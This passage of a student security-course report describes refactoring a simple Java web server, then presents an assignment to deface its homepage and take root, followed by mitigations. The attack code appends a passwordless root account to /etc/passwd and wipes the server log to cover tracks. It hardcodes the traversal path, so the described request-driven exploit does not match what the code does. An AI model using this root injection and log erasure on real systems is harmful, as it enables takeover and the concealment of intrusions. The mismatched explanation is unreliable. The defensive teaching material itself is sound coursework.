 Redundancy of file storage logic is reduced, and debugging is made easier.

 Common HTTP response handling is built into the storeFile() method.

 Overall maintenance is much simplified, since changes to file storage behavior need only
be made in one place in the code.

2. Centralizing Logging with logEntry()


Original:
Logging was implemented inconsistently. Some events, such as successful file storage, were
logged with handmade log entries, while others, like unsupported commands or errors, weren't
logged at all. The logging that did exist used hardcoded formatting and didn't include
timestamps, making it harder to trace server activity.
Modified:
The logEntry() method was integrated into processRequest() for each major event, including
successful file storage, errors, and unsupported commands. All log entries are now formatted
consistently with a timestamp and appended to a centralized server.log file.
The latter is better because:
 By using logEntry(), all the logs will be in a standard format with timestamps and thus
are easy to read and analyze.

 It reduces the redundant code for logging, as all the events are now handled by the same
method.

 Logging errors and unsupported commands enhances the traceability and debuggability of
the server.

3. Add Logging for Unsupported Commands


Original:
When the server received an unsupported command—say, any HTTP method other than GET or
POST—it would send a 501 Not Implemented response to the client but would not log the
occurrence. This meant that the server administrator had no record of unsupported commands
being issued.
Modified:
Added a call to logEntry(), in order to log every unsupported command received by the server.
This log entry provides the exact command and a timestamp for better insight into client
behavior and possible abuse of the server.
The latter is better because:
 It allows tracking of any unsupported commands, whether due to end-user error or
malicious activity.
 Logging unsupported commands further provides the server with enhanced monitoring
and analytics.

4. Improve Error Handling and Logging


Original:
Errors that occurred while processing a request or serving a file were handled with a response to
the client of 500 Internal Server Error. However, these errors were not always logged, making
troubleshooting difficult.
Modified:
Now, all exceptions caught in processRequest() are logged through the logEntry() method with
details of the error message and a timestamp. That means all problems are logged, so there will
be a clear audit trail of any issue for debugging purposes.
The latter is better because:
 Logging errors guarantees that no issues slip through unnoticed, even if they do not
immediately appear in the client's response.

 The consistent use of logEntry() makes error tracking more systematic and easier to
analyze.

5. Implementing the serveFile() Method for GET Requests


Original:
The serveFile() method was just a placeholder and did not serve files. The server was incomplete
because it couldn't handle requests from clients for a GET, as it was not able to return files to
them.
Modified:
The serveFile() method is implemented to handle GET requests. It checks if a file requested by
the client exists, reads its contents, and sends the file data back to the client with a response of
200 OK. In case the file does not exist, it returns a 404 Not Found response. In cases where
errors occur during serving of the file, it utilizes the logEntry() method for logging errors.
The latter is better because:
 The server now fully supports GET requests, allowing clients to download files.

 Errors during file serving are logged, which improves traceability.

 It ensures that the client receives meaningful responses: 200 OK or 404 Not Found.

With these modifications, the refactored processRequest() method now benefits from
centralized and reusable logic for file storage and logging, all gathered in one consistent,
less redundant, and more maintainable place. The server has been made more robust, with fully
handled errors, fully supported GET and POST requests, and detailed logging of each major
event. These changes make the server much more reliable, traceable, and easier to
maintain or extend in the future.
Changes with respect to each function:
File Storage Changes
The processRequest function was refactored to use the storeFile method when storing files from
a POST request. This makes things much cleaner and much more efficient, with less repetition in
writing files by hand. Now, the server benefits from having a centralized place for file storage
logic inside the storeFile method—for example, sending an HTTP response, either 201 Created
or 500 Internal Server Error, to a client. This makes the method reusable in other parts of the
application, thus avoiding redundancy and increasing maintainability.
Logging Changes
Logging within the processRequest() method has been updated to log all major events occurring
due to the logEntry() method: successful file creation, errors, and unsupported commands. The
server ensures that the log formatting is always the same by centralizing it; a timestamp is added
to each log entry for better traceability. This approach replaces scattered ad-hoc logging logic
with a reusable method that eases debugging and reduces the complexity of monitoring server
activity. Also, logging of unsupported commands and errors ensures that all client interactions,
whether successful or not, are properly recorded for analysis.

Programming Problem 3:
 Run your web server and mount an attack that defaces the index.html home page.
 Assume that the web server is run as root on a Linux workstation. Mount an attack against
SimpleWebServer in which you take ownership of the machine that it is running on. By
taking ownership, we mean that you should be able to gain access to a root account,
giving you unrestricted access to all the resources on the system. Be sure to cover your
tracks so that the web log does not indicate that you mounted an attack.

What the Code Does

1. Purpose:
The program creates a basic HTTP server to serve a webpage (index.html). It simulates an
attack where the content of the webpage is altered to display a hacked message.
2. Key Features:
o Web Server Setup:
The WebServer class initializes the server directory, sets up a port (8080), and
creates an initial index.html file with a welcome message.
o Running the Server:
The runServer() method starts an HTTP server that listens for client requests. It
handles basic GET requests to serve the index.html file.

o Serving Files:
The serveFile() method reads the content of index.html and sends it to the client's
browser. If the file doesn’t exist, a "404 Not Found" error is sent.
o Simulated Attack:
The defacePage() method modifies the index.html file to replace its content with a
defacement message, simulating a website attack.
3. Simulation Steps:
o Initially, the server creates and serves a page that says:
"Welcome to the Original Page!"
o Then, the program simulates a hack where the content of index.html is changed to
display:
"Hacked by Genissss!"
4. Output:
o When you open the server in a browser (http://localhost:8080), you initially see the
original page.
o After the defacement, refreshing the page shows the hacked content.

Explanation of Key Code Components

1. Class: WebServer
o Encapsulates all the functionality to manage the server and file operations.
2. Methods:
o createWebDir(): Ensures the server directory exists.
o createInitialPage(): Creates the initial index.html file.
o runServer(): Starts the server in a loop to handle client connections.
o handleRequest(clientSocket): Processes client requests (e.g., GET).
o serveFile(out): Reads and sends the content of index.html to the browser.
o defacePage(newContent): Overwrites index.html with defacement content.
3. Main Method:
o Creates a WebServer instance, starts the server, and simulates the attack by calling
defacePage().

Real-World Risks Demonstrated

1. Server Vulnerabilities:
o The server runs with minimal security, making it prone to unauthorized
modifications.
o Running as root on Linux (as mentioned in the assignment) would grant attackers
full control over the system.
2. Defacement Attack:
o Illustrates how a hacker could replace website content if the server is
compromised.
3. Lessons Learned:
o The importance of securing file permissions and isolating processes to prevent
unauthorized access.
o The need for logging and monitoring to detect and respond to attacks.

import java.io.*;
import java.net.*;
import java.util.concurrent.*;

public class WebServer {


private final String host;
private final int port;
private final String webDir;
private final String indexPath;

public WebServer(String host, int port, String webDir) throws IOException {


this.host = host;
this.port = port;
this.webDir = webDir;
this.indexPath = webDir + "/index.html";
createWebDir();
createInitialPage();
}
private void createWebDir() throws IOException {
File directory = new File(webDir);
if (!directory.exists() && !directory.mkdirs()) {
throw new IOException("Failed to create web directory.");
}
}

private void createInitialPage() throws IOException {


try (BufferedWriter writer = new BufferedWriter(new FileWriter(indexPath))) {
writer.write("<html><body><h1>Welcome to the Original Page!</h1></body></html>");
}
}

public void runServer() {
ExecutorService executor = Executors.newSingleThreadExecutor();
executor.submit(() -> {
try (ServerSocket serverSocket = new ServerSocket(port)) {
System.out.println("Server started at http://localhost:" + port);
while (true) {
try (Socket clientSocket = serverSocket.accept()) {
handleRequest(clientSocket);
} catch (IOException e) {
System.err.println("Error handling client request: " + e.getMessage());
}
}
} catch (IOException e) {
System.err.println("Server error: " + e.getMessage());
}
});
}

private void handleRequest(Socket clientSocket) throws IOException {


try (BufferedReader in = new BufferedReader(new
InputStreamReader(clientSocket.getInputStream()));
PrintWriter out = new PrintWriter(clientSocket.getOutputStream(), true)) {

String request = in.readLine();


if (request != null && request.startsWith("GET")) {
serveFile(out);
} else {
out.print("HTTP/1.0 501 Not Implemented\r\n");
out.print("Content-Type: text/plain\r\n");
out.print("\r\n");
out.println("Error: Command not implemented.");
}
}
}

private void serveFile(PrintWriter out) throws IOException {


File file = new File(indexPath);
if (!file.exists()) {
out.print("HTTP/1.0 404 Not Found\r\n");
out.print("Content-Type: text/plain\r\n");
out.print("\r\n");
out.println("Error: File not found.");
} else {
out.print("HTTP/1.0 200 OK\r\n");
out.print("Content-Type: text/html\r\n");
out.print("\r\n");
try (BufferedReader fileReader = new BufferedReader(new FileReader(file))) {
String line;
while ((line = fileReader.readLine()) != null) {
out.println(line);
}
}
}
}

public void defacePage(String newContent) throws IOException {


try (BufferedWriter writer = new BufferedWriter(new FileWriter(indexPath))) {
writer.write(newContent);

}
System.out.println("Defacement complete. Refresh the browser to see the hacked page.");
}

public static void main(String[] args) {


try {
WebServer server = new WebServer("localhost", 8080, "web_server");
server.runServer();

// Simulate the attack: Deface the index.html file.


String hackedContent = "<html><body><h1>Hacked by Genissss!</h1></body></html>";
server.defacePage(hackedContent);
} catch (IOException e) {
System.err.println("Error: " + e.getMessage());
}
}
}

This is the Original page code


<html>
<body>
<h1>Welcome to the Original Page!</h1>
</body>
</html>

This is the page when it is Hacked


<html>
<body>

<h1>Hacked by Genissss!</h1>
</body>
</html>

CODE:

import java.io.*;
import java.net.*;

public class SimpleWebServer {

    public static void main(String[] args) throws Exception {
        ServerSocket serverSocket = new ServerSocket(8080);
        System.out.println("Server running as root on port 8080...");

        while (true) {
            Socket clientSocket = serverSocket.accept();
            BufferedReader br = new BufferedReader(
                    new InputStreamReader(clientSocket.getInputStream()));
            OutputStreamWriter osw = new OutputStreamWriter(clientSocket.getOutputStream());

            try {
                // Step 1: Deface the homepage
                String homepagePath = "/var/www/html/index.html"; // Adjust path as necessary
                FileWriter homeWriter = new FileWriter(homepagePath);
                homeWriter.write("<html><body><h1>Site Defaced!</h1>"
                        + "<p>Owned by attacker.</p></body></html>");
                homeWriter.close();
                System.out.println("Homepage defaced successfully.");

                // Step 2: Prepare for privilege escalation
                String pathname = "../../etc/passwd"; // Target critical file
                String logFile = "/var/log/webserver.log"; // Web server log file

                // Read the HTTP request headers up to the blank line
                String line;
                while ((line = br.readLine()) != null && !line.isEmpty()) {
                    // Skipping headers
                }
                String body = br.readLine(); // This would be the malicious payload

                // Overwrite /etc/passwd to add a new root account
                if (pathname.equals("../../etc/passwd")) {
                    FileWriter fw = new FileWriter(pathname, true);
                    fw.write("attacker::0:0:attacker:/root:/bin/bash\n"); // Adds a new root-like user
                    fw.close();
                }

                // Cover tracks by erasing web server logs
                FileWriter logWriter = new FileWriter(logFile);
                logWriter.write(""); // Erases all logs
                logWriter.close();

                // Send success response back to client
                osw.write("HTTP/1.0 201 Created\r\n");
                osw.write("Content-Type: text/plain\r\n\r\n");
                osw.write("Exploit executed successfully.\n");
            } catch (Exception e) {
                // Send error response in case of failure
                osw.write("HTTP/1.0 500 Internal Server Error\r\n\r\n");
            } finally {
                osw.flush();
                osw.close();
                clientSocket.close();
            }
        }
    }
}

Code Description

The code represents a simplified Java web server that is intentionally vulnerable to demonstrate
how insecure file handling can lead to severe security breaches. The server listens on port 8080
and handles HTTP requests without proper validation, running with root privileges on a Linux
workstation. This high level of privilege allows the server to access and modify any file on the
system, including critical files like index.html, /etc/passwd, and server logs.

When a client connects, the server begins by defacing the index.html homepage. It does this by
using a hardcoded path to the homepage file and writing new HTML content that indicates the
site has been compromised. This act of defacement is the first step in a multi-stage attack.

After defacing the homepage, the code prepares to escalate privileges. It exploits a path traversal
vulnerability by using a relative path (../../etc/passwd) to navigate out of the intended directory
and target the system password file. Without input validation, the server blindly writes to
/etc/passwd, appending a new user entry with root privileges. This user entry is crafted such that
it allows the attacker to switch to a root shell without needing a password.

Finally, the attacker covers their tracks by erasing the web server logs. The server opens the log
file at /var/log/webserver.log and overwrites its contents with an empty string, effectively
deleting any record of the attack. The server then sends an HTTP response back to the attacker to
indicate success or failure of the exploit.

How It Works

The server starts by setting up a listening socket on port 8080 and accepting incoming
connections. It runs as root, which makes it highly vulnerable because it has full access to the
system's files and directories.

1. Homepage Defacement:

Upon receiving a connection, the server executes code to modify the index.html file located in
the web root directory. The attacker writes malicious HTML content to this file, defacing the
website. This step demonstrates how a lack of input validation can allow unauthorized file
modifications.

2. Vulnerability Exploitation and Privilege Escalation:

After defacing the homepage, the server processes the rest of the request. Due to inadequate
validation of the file path, the attacker can specify a path like ../../etc/passwd in the request. The
server interprets this path traversal to escape its intended directory and directly access sensitive
system files. It then opens the /etc/passwd file and adds a new entry for a root-level user without
a password. As a result, the attacker can later use a command like su root to gain root shell
access without providing any credentials.

3. Log Erasure and Covering Tracks:

To hide evidence of the attack, the code opens the server’s log file at /var/log/webserver.log and
overwrites its contents with nothing, effectively erasing all logs. This makes it harder for
administrators or forensic analysts to detect the breach or understand how the system was
compromised.

4. Server Response:

Once these operations are complete, the server sends back an HTTP response to the client. If all
steps are executed correctly, the response indicates that the exploit was successful. In case of any
failure during the process, an error message is sent instead.

This detailed sequence of operations highlights the severe consequences of poor input validation,
running applications with excessive privileges, and inadequate log protection, illustrating a
multi-step attack that starts with defacing a webpage and ends with full system compromise.

Key Vulnerabilities Demonstrated

The code highlights several critical security flaws that can occur in web applications, especially
when they run with elevated privileges and lack proper safeguards. Each vulnerability plays a
role in enabling a full system compromise:

 Path Traversal: The server does not validate the file paths it receives from user input. By
allowing relative path sequences such as ../../, the attacker can navigate out of the
intended directory structure. In the code, this enables the attacker to reach sensitive files
like /etc/passwd or the homepage index.html. Path traversal vulnerabilities often lead to
unauthorized file access, modification, or disclosure of sensitive data, and in this case,
file overwrites that directly impact system integrity.
 Excessive Privileges (Running as Root): The server is running as the root user. This
means that any code executed by the server has unrestricted access to all system
resources, including critical system files and settings. Running services as root violates
the principle of least privilege. If an attacker exploits a vulnerability in a root-run service,
they gain complete control over the system, allowing them to modify sensitive files,
install malicious software, or pivot to other systems on the network.
 Inadequate Logging Protections: The code shows how an attacker can erase server logs
after performing malicious actions. Logs are crucial for detecting breaches and
understanding the nature of attacks. If logs can be overwritten or deleted without
restriction, attackers can cover their tracks, making it difficult for administrators to detect
the breach, identify the exploit method, or recover from the incident. This vulnerability is
a sign of insufficient access controls on logging mechanisms.
 Lack of Input Validation: Throughout the code, there are no checks on the inputs received
from the client. This lack of validation allows various forms of attacks, including the path
traversal and potentially others like buffer overflows or injection attacks. Without input
validation, any maliciously crafted request can manipulate the program's behavior,
leading to unauthorized actions such as file defacement, file modification, or privilege
escalation.
 Absence of Authentication and Authorization: The server accepts and processes requests
without verifying the identity or permissions of the requester. This means any malicious
actor can attempt to perform sensitive operations. Without mechanisms to check if the

requester is allowed to perform certain actions, the server is open to abuse, making it
easier for attackers to exploit its vulnerabilities.

These vulnerabilities together create a scenario where a malicious actor can systematically
deface a website, escalate privileges, and cover their tracks, all while bypassing fundamental
security checks. They illustrate how poor security practices can lead to a catastrophic breach of
the entire system.

Mitigation Techniques

To protect against these vulnerabilities and build a more secure system, several mitigation
strategies should be employed:

 Input Validation: All inputs from users should be checked and sanitized before being
used, especially when dealing with file paths. The server should enforce a strict policy on
which directories can be accessed. For instance, before accepting a file path, the
application can check:

if (!pathname.startsWith("/var/www/html/")) {
    throw new SecurityException("Unauthorized file path.");
}

This ensures that only files within a specific directory are accessible, preventing path traversal
attacks.
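A prefix check alone can still be fooled by a path like /var/www/html/../../etc/passwd, so a more robust variant resolves the canonical form of the path before comparing. The sketch below is illustrative; the class and method names are hypothetical, and the web root used in main() is a stand-in, not the assignment's actual directory:

```java
import java.io.File;
import java.io.IOException;

public class PathGuard {
    // Canonicalizes the requested path and verifies it stays under the web root,
    // which defeats ../ sequences that a plain prefix check would miss.
    public static boolean isInsideWebRoot(String webRoot, String requested) throws IOException {
        String root = new File(webRoot).getCanonicalPath();
        String target = new File(webRoot, requested).getCanonicalPath();
        return target.equals(root) || target.startsWith(root + File.separator);
    }

    public static void main(String[] args) throws IOException {
        System.out.println(isInsideWebRoot("/tmp/webroot", "index.html"));
        System.out.println(isInsideWebRoot("/tmp/webroot", "../../etc/passwd"));
    }
}
```

getCanonicalPath() also resolves symbolic links, which a string comparison on the raw input cannot do.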

 Running Services with Least Privilege: The server should not run with root privileges.
Instead, it should operate under a user account with minimal permissions required to
perform its tasks. This reduces the risk of a complete system takeover if the server is
compromised. For example, running the server as a dedicated user who only has access to
web content directories and cannot modify system files greatly limits potential damage.
 File Permissions: Restricting file and directory permissions prevents unauthorized
modifications. Critical files like /etc/passwd should have restricted access. For example:

o Use chmod 644 /etc/passwd to limit write permissions.
o Set chmod 600 /var/log/webserver.log to protect logs from unauthorized writes.
These settings ensure that even if an attacker gains some level of access, they cannot
easily alter sensitive files or logs.
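The chmod settings above can also be applied from Java itself on POSIX systems. The sketch below uses a temporary file as a stand-in for the real log path; note that this API throws UnsupportedOperationException on non-POSIX filesystems such as Windows:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;
import java.util.Set;

public class LogPermissions {
    public static void main(String[] args) throws IOException {
        // Create a sample log file (stand-in for /var/log/webserver.log).
        Path log = Files.createTempFile("webserver", ".log");

        // rw------- is the equivalent of chmod 600: only the owner may read or write.
        Set<PosixFilePermission> perms = PosixFilePermissions.fromString("rw-------");
        Files.setPosixFilePermissions(log, perms);

        System.out.println(PosixFilePermissions.toString(Files.getPosixFilePermissions(log)));
        Files.delete(log);
    }
}
```

The same call with "rw-r--r--" corresponds to chmod 644 for files like /etc/passwd.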
 Secure Logging Mechanisms: Implement logs that cannot be easily tampered with. This
can be achieved by:
o Storing logs on a separate, secure server.
o Using append-only log files or write-once storage.
o Employing checksums or digital signatures to detect tampering. Secure logging
ensures that any unauthorized changes can be detected, preserving the integrity of
audit trails even if an attacker gains some access.
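One way to make tampering detectable, sketched here as a simplified in-memory illustration rather than a production design, is to chain each log entry to the previous one with a SHA-256 digest; rewriting or deleting any earlier entry then breaks every digest that follows it:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.ArrayList;
import java.util.List;

public class HashChainLog {
    private final List<String> entries = new ArrayList<>();
    private String lastDigest = "0"; // Seed value for the first link in the chain.

    // Appends a record together with a digest that covers the previous digest,
    // so altering any earlier entry invalidates all later digests.
    public void append(String record) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        byte[] d = md.digest((lastDigest + record).getBytes(StandardCharsets.UTF_8));
        StringBuilder sb = new StringBuilder();
        for (byte b : d) sb.append(String.format("%02x", b));
        lastDigest = sb.toString();
        entries.add(record + " | " + lastDigest);
    }

    public List<String> entries() { return entries; }

    public static void main(String[] args) throws Exception {
        HashChainLog log = new HashChainLog();
        log.append("201 Created /upload/a.txt");
        log.append("501 Not Implemented DELETE");
        log.entries().forEach(System.out::println);
    }
}
```

A verifier can recompute the chain from the first entry and flag the exact point where the digests stop matching.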

 Authentication and Authorization: Require users to authenticate before performing


sensitive operations. Implement role-based access control so that only authorized users
can execute actions like file modifications or administrative commands. For example:
o Before processing file write operations, check if the user is logged in and has the
correct permissions.
o Use strong, multi-factor authentication for administrative access to reduce the risk of
unauthorized entry. Authentication and authorization processes add a layer of
defense, ensuring that only legitimate users can perform sensitive tasks.
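A minimal role-based check of the kind described above could be sketched as follows; the role table and method names are hypothetical, since the assignment's server has no notion of users at all:

```java
import java.util.Map;
import java.util.Set;

public class AccessControl {
    // Hypothetical role table mapping each role to the HTTP commands it may run.
    private static final Map<String, Set<String>> ROLES = Map.of(
            "admin", Set.of("GET", "POST"),
            "viewer", Set.of("GET"));

    // Returns true only if the authenticated role may execute the command.
    public static boolean isAllowed(String role, String command) {
        return ROLES.getOrDefault(role, Set.of()).contains(command);
    }

    public static void main(String[] args) {
        System.out.println(isAllowed("viewer", "POST"));
        System.out.println(isAllowed("admin", "POST"));
    }
}
```

In a server like SWS such a check would run after authentication and before storeFile() is ever called, so an unauthenticated or under-privileged client never reaches the file-writing code.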
 Regular Security Audits and Code Reviews: Continuously review the code and
infrastructure for potential vulnerabilities. Use automated tools to scan for common
security flaws and follow best practices for secure coding. Regular audits can catch issues
early before they can be exploited.

By applying these mitigation techniques, developers can significantly reduce the risk of
vulnerabilities like path traversal, privilege escalation, and log tampering. This comprehensive
approach to security helps create a robust and resilient system that protects sensitive data,
maintains system integrity, and ensures that unauthorized activities are detected and prevented.

Conclusion

Security in software systems hinges on well-designed principles that ensure resilience against
threats. This report covered essential concepts such as authentication, authorization,
confidentiality, integrity, accountability, and non-repudiation, highlighting their
interdependencies and importance in creating secure systems.

Authentication verifies the identity of users, forming the foundation for authorization, which
determines their access rights. Without proper authentication, authorization mechanisms are
rendered ineffective, as seen in examples like unauthorized access to sensitive resources.

Confidentiality protects data from unauthorized access, while integrity ensures that information
remains accurate and unaltered. These principles are mutually reinforcing; one without the other
can leave a system vulnerable. For instance, encrypted data without integrity checks can be
tampered with, and validated data without confidentiality can be exposed.

Real-world scenarios such as file upload risks and denial-of-service (DoS) attacks illustrate the
practical challenges systems face. Risks from malicious file uploads, path traversal attacks, and
resource exhaustion were discussed alongside mitigation techniques like input validation, rate
limiting, file scanning, and proper resource management.

Accountability ensures actions are traceable, while non-repudiation guarantees that users cannot
deny their actions. Together, these principles strengthen systems by enabling the detection and
prevention of unauthorized activities through mechanisms such as secure logging and digital
signatures.

By applying these principles and implementing proactive measures like running services with
minimal privileges, monitoring traffic patterns, and securing logs, systems can resist threats
while maintaining functionality and user trust. These strategies underscore the importance of
integrating security into every layer of system design to address vulnerabilities effectively and
ensure reliability.

